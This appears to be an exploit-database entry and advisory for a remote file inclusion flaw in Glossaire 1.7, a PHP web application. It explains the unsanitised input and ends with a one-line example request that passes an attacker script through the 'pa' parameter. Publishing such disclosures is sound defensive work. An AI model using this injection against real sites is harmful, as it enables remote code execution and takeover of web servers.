Glossaire 1.7 - Remote File Inclusion

Author: CrAzY CrAcKeR
type: webapps
platform: php
port: 
date_added: 2006-07-03  
date_updated: 2013-09-09  
verified: 1  
codes: CVE-2006-3363;OSVDB-34451  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 28159.txt  
source: https://www.securityfocus.com/bid/18792/info

Glossaire is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and gain access to the underlying system.

www.example.com/grossaire/index.php?pa=[evil_script]